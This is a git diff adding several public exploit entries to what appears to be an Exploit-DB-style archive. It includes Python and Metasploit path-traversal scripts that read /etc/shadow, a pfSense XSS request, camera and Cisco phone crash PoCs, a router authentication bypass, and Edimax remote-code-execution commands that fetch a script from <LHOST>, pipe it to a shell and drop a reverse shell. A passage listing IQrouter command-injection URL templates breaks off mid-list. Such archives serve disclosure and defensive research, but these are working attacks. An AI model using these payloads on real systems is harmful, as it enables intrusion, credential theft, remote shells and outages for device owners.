diff --git a/exploits/cgi/webapps/48308.py b/exploits/cgi/webapps/48308.py
new file mode 100755
index 000000000..5ce0b9588
--- /dev/null
+++ b/exploits/cgi/webapps/48308.py
@@ -0,0 +1,31 @@
+# Exploit Title: Zen Load Balancer 3.10.1 - 'index.cgi' Directory Traversal
+# Date: 2020-04-10
+# Exploit Author: Basim Alabdullah
+# Software Link: https://sourceforge.net/projects/zenloadbalancer/files/Distro/zenloadbalancer-distro_3.10.1.iso/download
+# Version: 3.10.1
+# Tested on: Debian8u2
+#
+# Technical Details:
+# The filelog parameter is vulnerable to path traversal attacks, enabling read access to arbitrary files on the server.
+# The payload ../../../../../../../../../../../../../../../../etc/shadow was submitted in the filelog parameter. The requested file was returned in the application's response.
+# Note that disclosure of the shadow file may allow an attacker to discover users' passwords
+#
+# Impact:
+# --------
+# Successful exploitation could allow an attacker to obtain sensitive
+# information.
+
+import requests
+import sys
+
+if len(sys.argv) <2:
+ print("Example Use: python exploit.py https://192.168.1.1:444 /etc/shadow")
+ sys.exit(-1)
+else:
+ files=sys.argv[2]
+ url=sys.argv[1]
+ with requests.session() as s:
+ urlz=url+"/index.cgi?id=2-3&filelog=../../../../../../../../../../../../../../../../"+files+"&nlines=100&action=See+logs"
+ response = s.get(urlz, auth=('admin', 'admin'), verify=False)
+ txt=response.text
+ print(response.text)
\ No newline at end of file
diff --git a/exploits/cgi/webapps/48373.rb b/exploits/cgi/webapps/48373.rb
new file mode 100755
index 000000000..5e00bbf82
--- /dev/null
+++ b/exploits/cgi/webapps/48373.rb
@@ -0,0 +1,83 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Auxiliary
+ include Msf::Auxiliary::Report
+ include Msf::Auxiliary::Scanner
+ include Msf::Exploit::Remote::HttpClient
+
+ def initialize(info={})
+ super(update_info(info,
+ 'Name' => "Zen Load Balancer Directory Traversal",
+ 'Description' => %q{
+ This module exploits a authenticated directory traversal
+vulnerability in Zen Load
+ Balancer `v3.10.1`. The flaw exists in 'index.cgi' not
+properly handling 'filelog='
+ parameter which allows a malicious actor to load arbitrary file path.
+ },
+ 'License' => MSF_LICENSE,
+ 'Author' =>
+ [
+ 'Basim Alabdullah', # Vulnerability discovery
+ 'Dhiraj Mishra' # Metasploit module
+ ],
+ 'References' =>
+ [
+ ['EDB', '48308']
+ ],
+ 'DisclosureDate' => "Apr 10 2020"
+ ))
+
+ register_options(
+ [
+ Opt::RPORT(444),
+ OptBool.new('SSL', [true, 'Use SSL', true]),
+ OptInt.new('DEPTH', [true, 'The max traversal depth', 16]),
+ OptString.new('FILEPATH', [false, 'The name of the file to
+download', '/etc/passwd']),
+ OptString.new('TARGETURI', [true, "The base URI path of the
+ZenConsole install", '/']),
+ OptString.new('HttpUsername', [true, 'The username to use for
+the HTTP server', 'admin']),
+ OptString.new('HttpPassword', [false, 'The password to use for
+the HTTP server', 'admin'])
+ ])
+ end
+
+ def run_host(ip)
+ filename = datastore['FILEPATH']
+ traversal = "../" * datastore['DEPTH']
+
+ res = send_request_cgi({
+ 'method' => 'GET',
+ 'uri' => normalize_uri(target_uri.path, 'index.cgi'),
+ 'vars_get'=>
+ {
+ 'id' => '2-3',
+ 'filelog' => "#{traversal}#{filename}",
+ 'nlines' => '100',
+ 'action' => 'See logs'
+ },
+ 'authorization' =>
+basic_auth(datastore['HttpUsername'],datastore['HttpPassword'])
+ }, 25)
+
+ unless res && res.code == 200
+ print_error('Nothing was downloaded')
+ return
+ end
+
+ print_good("#{peer} - Downloaded #{res.body.length} bytes")
+ path = store_loot(
+ 'zenload.http',
+ 'text/plain',
+ ip,
+ res.body,
+ filename
+ )
+ print_good("File saved in: #{path}")
+ end
+end
\ No newline at end of file
diff --git a/exploits/freebsd/webapps/48300.txt b/exploits/freebsd/webapps/48300.txt
new file mode 100644
index 000000000..f485c9955
--- /dev/null
+++ b/exploits/freebsd/webapps/48300.txt
@@ -0,0 +1,39 @@
+# Exploit Title: pfSense 2.4.4-P3 - 'User Manager' Persistent Cross-Site Scripting
+# Date: 2020-04-02
+# Exploit Author: Matthew Aberegg
+# Vendor Homepage: https://www.pfsense.org
+# Version: PfSense 2.4.4-P3
+# Tested on: FreeBSD 11.2-RELEASE-p10
+# CVE : CVE-2020-11457
+
+# Vulnerability Details
+# Description : A persistent cross-site scripting vulnerability exists within the 'User Manager' functionality of the pfSense administration panel.
+# Vulnerable Parameter : descr
+
+
+# POC
+# Exploit Details : The following request will create a user in the 'User Manager' functionality with an XSS payload as the Full Name.
+# This payload can be triggered by navigating to "https://TARGET/system_usermanager_addprivs.php?userid=0" where userid is
+# the id of the user containing the payload.
+
+
+POST /system_usermanager.php?act=new HTTP/1.1
+Host: TARGET
+Connection: close
+Content-Length: 410
+Cache-Control: max-age=0
+Origin: https://TARGET
+Upgrade-Insecure-Requests: 1
+Content-Type: application/x-www-form-urlencoded
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36
+Sec-Fetch-Dest: document
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
+Sec-Fetch-Site: same-origin
+Sec-Fetch-Mode: navigate
+Sec-Fetch-User: ?1
+Referer: https://TARGET/system_usermanager.php?act=new
+Accept-Encoding: gzip, deflate
+Accept-Language: en-US,en;q=0.9
+Cookie: PHPSESSID=ebd302521a887cef99f517e3ac6bdd7d
+
+__csrf_magic=sid%3A3689bbf23a3350994d7543c082fc36d16397208d%2C1585881631&usernamefld=TEST&passwordfld1=password&passwordfld2=password&descr=%3Cimg+src%3D%2F+onerror%3Dalert%281%29%3E&expires=&webguicss=pfSense.css&webguifixedmenu=&webguihostnamemenu=&dashboardcolumns=2&name=&caref=5e643dcfd524e&keylen=2048&lifetime=3650&authorizedkeys=&ipsecpsk=&act=&userid=&privid=&certid=&utype=user&oldusername=&save=Save
\ No newline at end of file
diff --git a/exploits/hardware/webapps/48304.py b/exploits/hardware/webapps/48304.py
new file mode 100755
index 000000000..b73eb9ca5
--- /dev/null
+++ b/exploits/hardware/webapps/48304.py
@@ -0,0 +1,153 @@
+# Exploit Title: Amcrest Dahua NVR Camera IP2M-841 - Denial of Service (PoC)
+# Date: 2020-04-07
+# Exploit Author: Jacob Baines
+# Vendor Homepage: https://amcrest.com/
+# Software Link: https://amcrest.com/firmwaredownloads
+# Version: Many different versions due to number of Dahua/Amcrest/etc
+# devices affected
+# Tested on: Amcrest IP2M-841 2.420.AC00.18.R and AMDVTENL8-H5
+# 4.000.00AC000.0
+# CVE : CVE-2020-5735
+# Advisory: https://www.tenable.com/security/research/tra-2020-20
+# Amcrest & Dahua NVR/Camera Port 37777 Authenticated Crash
+
+import argparse
+import hashlib
+import socket
+import struct
+import sys
+import md5
+import re
+
+## DDNS test functionality. Stack overflow via memcpy
+
+def recv_response(sock):
+ # minimum size is 32 bytes
+ header = sock.recv(32)
+
+ # check we received enough data
+ if len(header) != 32:
+ print 'Invalid response. Too short'
+ return (False, '', '')
+
+ # extract the payload length field
+ length_field = header[4:8]
+ payload_length = struct.unpack_from('I', length_field)
+ payload_length = payload_length[0]
+
+ # uhm... lets be restrictive of accepted lengths
+ if payload_length < 0 or payload_length > 4096:
+ print 'Invalid response. Bad payload length'
+ return (False, header, '')
+
+ if (payload_length == 0):
+ return (True, header, '')
+
+ payload = sock.recv(payload_length)
+ if len(payload) != payload_length:
+ print 'Invalid response. Bad received length'
+ return (False, header, payload)
+
+ return (True, header, payload)
+
+def sofia_hash(msg):
+ h = ""
+ m = hashlib.md5()
+ m.update(msg)
+ msg_md5 = m.digest()
+ for i in range(8):
+ n = (ord(msg_md5[2*i]) + ord(msg_md5[2*i+1])) % 0x3e
+ if n > 9:
+ if n > 35:
+ n += 61
+ else:
+ n += 55
+ else:
+ n += 0x30
+ h += chr(n)
+ return h
+
+top_parser = argparse.ArgumentParser(description='lol')
+top_parser.add_argument('-i', '--ip', action="store", dest="ip",
+required=True, help="The IPv4 address to connect to")
+top_parser.add_argument('-p', '--port', action="store", dest="port",
+type=int, help="The port to connect to", default="37777")
+top_parser.add_argument('-u', '--username', action="store",
+dest="username", help="The user to login as", default="admin")
+top_parser.add_argument('--pass', action="store", dest="password",
+required=True, help="The password to use")
+args = top_parser.parse_args()
+
+sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+print "[+] Attempting connection to " + args.ip + ":" + str(args.port)
+sock.connect((args.ip, args.port))
+print "[+] Connected!"
+
+# send the old style login request. We'll use blank hashes. This should
+# trigger a challenge from new versions of the camera
+old_login = ("\xa0\x05\x00\x60\x00\x00\x00\x00" +
+ "\x00\x00\x00\x00\x00\x00\x00\x00" + # username hash
+ "\x00\x00\x00\x00\x00\x00\x00\x00" + # password hash
+ "\x05\x02\x00\x01\x00\x00\xa1\xaa")
+sock.sendall(old_login)
+(success, header, challenge) = recv_response(sock)
+if success == False or not challenge:
+ print 'Failed to receive the challenge'
+ print challenge
+ sys.exit(0)
+
+# extract the realm and random seed
+seeds = re.search("Realm:(Login to [A-Za-z0-9]+)\r\nRandom:([0-9]+)\r\n",
+challenge)
+if seeds == None:
+ print 'Failed to extract realm and random seed.'
+ print challenge
+ sys.exit(0)
+
+realm = seeds.group(1)
+random = seeds.group(2)
+
+# compute the response
+realm_hash = md5.new(args.username + ":" + realm + ":" +
+args.password).hexdigest().upper()
+random_hash = md5.new(args.username + ":" + random + ":" +
+realm_hash).hexdigest().upper()
+sofia_result = sofia_hash(args.password)
+final_hash = md5.new(args.username + ":" + random + ":" +
+sofia_result).hexdigest().upper()
+
+challenge_resp = ("\xa0\x05\x00\x60\x47\x00\x00\x00" +
+ "\x00\x00\x00\x00\x00\x00\x00\x00" +
+ "\x00\x00\x00\x00\x00\x00\x00\x00" +
+ "\x05\x02\x00\x08\x00\x00\xa1\xaa" +
+ args.username + "&&" + random_hash + final_hash)
+sock.sendall(challenge_resp)
+
+(success, header, payload) = recv_response(sock)
+if success == False or not header:
+ print 'Failed to receive the session id'
+ sys.exit(0)
+
+session_id_bin = header[16:20]
+session_id_int = struct.unpack_from('I', session_id_bin)
+if session_id_int[0] == 0:
+ print "Log in failed."
+ sys.exit(0)
+
+session_id = session_id_int[0]
+print "[+] Session ID: " + str(session_id)
+
+# firmware version
+command = "Protocol: " + ("a" * 0x300) + "\r\n"
+command_length = struct.pack("I", len(command))
+firmware = ("\x62\x00\x00\x00" + command_length +
+ "\x04\x00\x00\x00\x00\x00\x00\x00" +
+ "\x00\x00\x00\x00\x00\x00\x00\x00" +
+ "\x00\x00\x00\x00\x00\x00\x00\x00" +
+ command)
+sock.sendall(firmware)
+(success, header, firmware_string) = recv_response(sock)
+if success == False and not header:
+ print "[!] Probably crashed the server."
+else:
+ print "[+] Attack failed."
\ No newline at end of file
diff --git a/exploits/hardware/webapps/48310.txt b/exploits/hardware/webapps/48310.txt
new file mode 100644
index 000000000..61e7d2b48
--- /dev/null
+++ b/exploits/hardware/webapps/48310.txt
@@ -0,0 +1,51 @@
+# Title: Huawei HG630 2 Router - Authentication Bypass
+# Date: 2020-04-13
+# Author: Eslam Medhat
+# Vendor Homepage: www.huawei.com
+# Version: HG630 V2
+# HardwareVersion: VER.B
+# CVE: N/A
+
+#POC:
+
+The default password of this router is the last 8 characters of the
+device's serial number which exist in the back of the device.
+
+An attacker can leak the serial number via the web app API like the
+following:
+
+************************Request************************
+GET /api/system/deviceinfo HTTP/1.1
+Host: 192.168.1.1
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:65.0)
+Gecko/20100101 Firefox/65.0
+Accept: application/json, text/javascript, */*; q=0.01
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer: https://192.168.1.1/
+X-Requested-With: XMLHttpRequest
+Connection: close
+Cookie:
+SessionID_R3=0PVHKCwY01etBMntI9TZZRvYX04emsjws0Be4EQ8VcoojhWaRQpOV9E0BbAktJDwzI0au6s1xgl0Cn7bvN9rejjMhJCI1t07f2XDnbo09tjN4mcG0XMyXbMoJLjViHm
+
+
+************************Response************************
+HTTP/1.1 200 OK
+Cache-Control: no-cache, no-store, max-age=0, must-revalidate
+X-Download-Options: noopen
+X-Frame-Options: SAMEORIGIN
+X-XSS-Protection: 1; mode=block
+Date: Fri, 01 Jan 2010 09:14:47 GMT
+Connection: Keep-Alive
+Content-Language: en
+Content-Type: application/javascript
+Content-Length: 141
+
+while(1); /*{"DeviceName":"HG630
+V2","SerialNumber":"T5D7S18815905395","ManufacturerOUI":"00E0FC","UpTime":33288,"HardwareVersion":"VER.B"}*/
+
+
+You can use that serial number to login to the router.
+
+#Reference:
+https://www.youtube.com/watch?v=vOrIL7L_cVc
\ No newline at end of file
diff --git a/exploits/hardware/webapps/48311.py b/exploits/hardware/webapps/48311.py
new file mode 100755
index 000000000..18243acd7
--- /dev/null
+++ b/exploits/hardware/webapps/48311.py
@@ -0,0 +1,43 @@
+# Exploit Title: TVT NVMS 1000 - Directory Traversal
+# Date: 2020-04-13
+# Exploit Author: Mohin Paramasivam (Shad0wQu35t)
+# Vendor Homepage: http://en.tvt.net.cn/
+# Version : N/A
+# Software Link : http://en.tvt.net.cn/products/188.html
+# Original Author : Numan Türle
+# CVE : CVE-2019-20085
+
+import sys
+import requests
+import os
+import time
+
+if len(sys.argv) !=4:
+ print " "
+ print "Usage : python exploit.py url filename outputname"
+ print "Example : python exploit.py http://10.10.10.10/ windows/win.ini win.ini"
+ print " "
+else:
+
+
+ traversal = "../../../../../../../../../../../../../"
+ filename = sys.argv[2]
+ url = sys.argv[1]+traversal+filename
+ outputname = sys.argv[3]
+ content = requests.get(url)
+
+ if content.status_code == 200:
+
+ print " "
+ print "Directory Traversal Succeeded"
+ time.sleep(3)
+ print " "
+ print "Saving Output"
+ os.system("touch " + outputname)
+ output_write = open(outputname,"r+")
+ output_write.write(content.text)
+ output_write.close()
+
+ else:
+
+ print "Host not vulnerable to Directory Traversal!"
\ No newline at end of file
diff --git a/exploits/hardware/webapps/48318.txt b/exploits/hardware/webapps/48318.txt
new file mode 100644
index 000000000..c9731d595
--- /dev/null
+++ b/exploits/hardware/webapps/48318.txt
@@ -0,0 +1,42 @@
+# Exploit Title: Edimax Technology EW-7438RPn-v3 Mini 1.27 - Remote Code Execution
+# Date: 2020-04-13
+# Exploit Author: Wadeek
+# Hardware Version: EW-7438RPn-v3 Mini
+# Firmware Version: 1.23 / 1.27
+# Vendor Homepage: https://www.edimax.com/edimax/merchandise/merchandise_detail/data/edimax/global/wi-fi_range_extenders_n300/ew-7438rpn_mini/
+# Firmware Link: https://www.edimax.com/edimax/mw/cufiles/files/download/Firmware/EW-7438RPn_mini_1.27.zip
+
+== Shodan Dorks ==
+
+(Setup Mode) "HTTP/1.0 302 Redirect" "Server: Boa/0.94.14rc21" "http://(null)/index.asp"
+(Unsetup Mode) "HTTP/1.1 401 Unauthorized" "Server: Boa/0.94.14rc21" "Default Name:admin Password:1234"
+
+== Unauthorized Access - Wi-Fi Password Disclosure (Unsetup Mode) ==
+
+GET /wizard_reboot.asp
+showSSID = "<WIRELESS-NAME>";
+document.write('<font class=\"textcolor\">'+"<WIRELESS-SECURITY-KEY>"+'</font>');
+
+== Command Execution * ==
+
+(Setup Mode)
+curl 'http://<RHOST>/goform/mp' --data 'command=%7C%7C+busybox+wget+-O+-+http%3A%2F%2F<LHOST>%2Fdelivery.sh+%7C+%2Fbin%2Fsh'
+
+(Unsetup Mode with default password)
+curl 'http://<RHOST>/goform/mp' -H 'Authorization: Basic YWRtaW46MTIzNA==' --data 'command=%7C%7C+busybox+wget+-O+-+http%3A%2F%2F<LHOST>%2Fdelivery.sh+%7C+%2Fbin%2Fsh'
+
+== Cross-Site Request Forgery -> Command Execution * ==
+
+<form action="http://edimaxext.setup/goform/mp" method="POST">
+ <input type="hidden" name="command" value="|| busybox wget -O - http://<LHOST>/delivery.sh | /bin/sh">
+ <input type="submit" value="">
+</form>
+
+* [ delivery.sh ]
+--------------------------------------------------------------------------------------
+# (msfvenom) linux/mipsbe/shell/reverse_tcp
+cd /tmp/
+busybox wget -O reverse http://<LHOST>/reverse
+busybox chmod +x reverse
+./reverse &
+--------------------------------------------------------------------------------------
\ No newline at end of file
diff --git a/exploits/hardware/webapps/48342.txt b/exploits/hardware/webapps/48342.txt
new file mode 100644
index 000000000..b143e957d
--- /dev/null
+++ b/exploits/hardware/webapps/48342.txt
@@ -0,0 +1,13 @@
+# Exploit Title: Cisco IP Phone 11.7 - Denial of Service (PoC)
+# Date: 2020-04-15
+# Exploit Author: Jacob Baines
+# Vendor Homepage: https://www.cisco.com
+# Software Link: https://www.cisco.com/c/en/us/products/collaboration-endpoints/ip-phones/index.html
+# Version: Before 11.7(1)
+# Tested on: Cisco Wireless IP Phone 8821
+# CVE: CVE-2020-3161
+# Cisco Advisory: https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-voip-phones-rce-dos-rB6EeRXs
+# Researcher Advisory: https://www.tenable.com/security/research/tra-2020-24
+
+curl -v --path-as-is --insecure
+https://phone_address/deviceconfig/setActivationCode?params=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
\ No newline at end of file
diff --git a/exploits/hardware/webapps/48358.py b/exploits/hardware/webapps/48358.py
new file mode 100755
index 000000000..dc5fb38ab
--- /dev/null
+++ b/exploits/hardware/webapps/48358.py
@@ -0,0 +1,339 @@
+# Exploit Title: IQrouter 3.3.1 Firmware - Remote Code Execution
+# Date: 2020-04-21
+# Exploit Author: drakylar
+# Vendor Homepage: https://evenroute.com/
+# Software Link: https://evenroute.com/iqrouter
+# Version: IQrouter firmware up to 3.3.1
+# Tested on: IQrouter firmware 3.3.1
+# CVE : N/A
+
+#!/usr/bin/env python3
+import argparse
+from sys import argv, exit
+
+try:
+ import requests
+except ImportError:
+ print("Install requests lib! pip3 install requests")
+
+
+print("""
+#######################################################################
+# IQrouter multiple RCE and other vulnerabilities #
+# by drakylar (Shaposhnikov Ilya) #
+# CVE-2020-11963 CVE-2020-11964 CVE-2020-11966 #
+# CVE-2020-11967 CVE-2020-11968 #
+#######################################################################
+""")
+
+
+rce_setup = [
+ [
+ "/cgi-bin/luci/er/vlanTag?vlan_tag='`{}`'",
+ "RCE /vlanTag (vlan_tag param)"
+ ],
+ [
+ "/cgi-bin/luci/er/verify_wifi?wifi_conflict='`{}`'",
+ "RCE /verify_wifi (wifi_conflict param). Need hide_wifi_config != true"
+ ],
+ [
+ "/cgi-bin/luci/er/screen9?save_creds=1&s1&s2='`{}`'&p1&p2",
+ "RCE /screen9 (s2 param)"
+ ],
+ [
+ "/cgi-bin/luci/er/screen9?save_creds=1&s1='`{}`'&s2&p1&p2",
+ "RCE /screen9 (s1 param)"
+ ],
+ [
+ "/cgi-bin/luci/er/screen9?save_creds=1&s1&s2&p1&p2='`{}`'",
+ "RCE /screen9 (p2 param)"
+ ],
+ [
+ "/cgi-bin/luci/er/screen9?save_creds=1&s1&s2&p1='`{}`'&p2",
+ "RCE /screen9 (p1 param)"
+ ],
+ [
+ "/cgi-bin/luci/er/screen4?save_isp='`{}`",
+ "RCE /screen4 (save_isp param)"
+ ],
+ [
+ "/cgi-bin/luci/er/screen2?set_wan_modem_interfaces='`{}`'",
+ "RCE /screen2 set_wan_modem_interfaces param)"
+ ],
+ [
+ "/cgi-bin/luci/er/screen2?find_ip_address_conflict='`{}`'",
+ "RCE /screen2 find_ip_address_conflict param)"
+ ],
+ [
+ "/cgi-bin/luci/er/screen10?set_security_question='`{}`'",
+ "RCE /screen10 (set_security_question param)"
+ ],
+ [
+ "/cgi-bin/luci/er/screen10?set_security_answer='`{}`'&set_security_question=1",
+ "RCE /screen10 (set_security_answer param)"],
+ [
+ "/cgi-bin/luci/er/screen1?zonename='`{}`'",
+ "RCE /screen1 (zonename param)"
+ ],
+ [
+ "/cgi-bin/luci/er/register?email=`{}`",
+ "RCE /register (email param, result in /cgi-bin/luci/er/get_syslog for result)"
+ ]
+]
+
+rce_any = [
+ [
+ "/cgi-bin/luci/er/wifi?enable_guestwifi=1&guest_key=2&disable_guestwifi=1&connection_test=1&disassociate_low_ack_update=1&guestwifi_2g_ssid=3&guestwifi_5g_ssid=4&get_network_details=1&switch_reset_wifi_mode=1&save_creds=1&s1=1&s2='`{}`'&p1=1&p2=1",
+ "RCE /wifi (s2 param)"
+ ],
+ [
+ "/cgi-bin/luci/er/wifi?enable_guestwifi=1&guest_key=2&disable_guestwifi=1&connection_test=1&disassociate_low_ack_update=1&guestwifi_2g_ssid=3&guestwifi_5g_ssid=4&get_network_details=1&switch_reset_wifi_mode=1&save_creds=1&s1='`{}`'&s2=5&p1=6&p2=7",
+ "RCE /wifi (s1 param)"
+ ],
+ [
+ "/cgi-bin/luci/er/wifi?enable_guestwifi=1&guest_key=2&disable_guestwifi=1&connection_test=1&disassociate_low_ack_update=1&guestwifi_2g_ssid=3&guestwifi_5g_ssid=4&get_network_details=1&switch_reset_wifi_mode=1&save_creds=1&s1=1&s2=2&p1=3&p2='`{}`'",
+ "RCE /wifi (p2 param)"
+ ],
+ [
+ "/cgi-bin/luci/er/wifi?enable_guestwifi=1&guest_key=2&disable_guestwifi=1&connection_test=1&disassociate_low_ack_update=1&guestwifi_2g_ssid=3&guestwifi_5g_ssid=4&get_network_details=1&switch_reset_wifi_mode=1&save_creds=1&s1=1&s2=2&p1='`{}`'&p2=4",
+ "RCE /wifi (p1 param)"
+ ],
+ [
+ "/cgi-bin/luci/er/wifi?enable_guestwifi=1&guest_key=2&disable_guestwifi=1&connection_test=1&disassociate_low_ack_update=1&guestwifi_2g_ssid=3&guestwifi_5g_ssid=`{}`&get_network_details=1&switch_reset_wifi_mode=1&save_creds=1&s1=4&s2=5&p1=6&p2=7",
+ "RCE /wifi (guestwifi_5g_ssid param)"
+ ],
+ [
+ "/cgi-bin/luci/er/wifi?enable_guestwifi=1&guest_key=2&disable_guestwifi=1&connection_test=1&disassociate_low_ack_update=1&guestwifi_2g_ssid=`{}`&guestwifi_5g_ssid=3&get_network_details=1&switch_reset_wifi_mode=1&save_creds=1&s1=4&s2=5&p1=6&p2=7",
+ "RCE /wifi (guestwifi_2g_ssid param)"
+ ],
+ [
+ "/cgi-bin/luci/er/wifi?enable_guestwifi=1&guest_key='`{}`'&disable_guestwifi=1&connection_test=1&disassociate_low_ack_update=1&guestwifi_2g_ssid=2&guestwifi_5g_ssid=3&get_network_details=1&switch_reset_wifi_mode=1&save_creds=1&s1=4&s2=5&p1=6&p2=7",
+ "RCE /wifi (guest_key param)"
+ ],
+ [
+ "/cgi-bin/luci/er/wifi?enable_guestwifi='`{}`'&guest_key=2&disable_guestwifi=1&connection_test=1&disassociate_low_ack_update=1&guestwifi_2g_ssid=3&guestwifi_5g_ssid=4&get_network_details=1&switch_reset_wifi_mode=1&save_creds=1&s1=5&s2=6&p1=6&p2=7",
+ "RCE /wifi (enable_guestwifi param)"
+ ],
+ [
+ "/cgi-bin/luci/er/screen11.1?email=`{}`®ister=123&uilog=123&bg=123",
+ "RCE /screen11.1 (email param)"
+ ],
+ [
+ "/cgi-bin/luci/er/reboot_link?link='`{}`'",
+ "RCE /reboot_link (link param)"
+ ],
+ [
+ "/cgi-bin/luci/er/diag_wifi/1/2/3/4/5/'`{}`'/",
+ "RCE /diag_wifi (htm5ghz param)"
+ ],
+ [
+ "/cgi-bin/luci/er/diag_wifi/1/2/3/4/'`{}`'/6/",
+ "RCE /diag_wifi (htm2ghz param)"
+ ],
+ [
+ "/cgi-bin/luci/er/diag_wifi/1/2/3/'`{}`'/5/6/",
+ "RCE /diag_wifi (c5ghz param)"
+ ],
+ [
+ "/cgi-bin/luci/er/diag_wifi/1/2/'`{}`'/4/5/6/",
+ "RCE /diag_wifi (c2ghz param)"
+ ],
+ [
+ "/cgi-bin/luci/er/diag_set_static_wan/'`{}`'/2/3/4/",
+ "RCE /diag_set_static_wan (static_ip param)"
+ ],
+ [
+ "/cgi-bin/luci/er/diag_set_static_wan/1/'`{}`'/3/4/",
+ "RCE /diag_set_static_wan (net_mask param)"
+ ],
+ [
+ "/cgi-bin/luci/er/diag_set_static_wan/1/2/'`{}`'/4/",
+ "RCE /diag_set_static_wan (gateway param)"
+ ],
+ [
+ "/cgi-bin/luci/er/diag_set_static_wan/1/2/3/'`{}`'/",
+ "RCE /diag_set_static_wan (dns param)"
+ ],
+ [
+ "/cgi-bin/luci/er/diag_set_static_modem/'`{}`'/2/3/",
+ "RCE /diag_set_static_modem (static_ip param)"
+ ],
+ [
+ "/cgi-bin/luci/er/diag_set_static_modem/1/'`{}`'/3/",
+ "RCE /diag_set_static_modem (net_mask param)"
+ ],
+ [
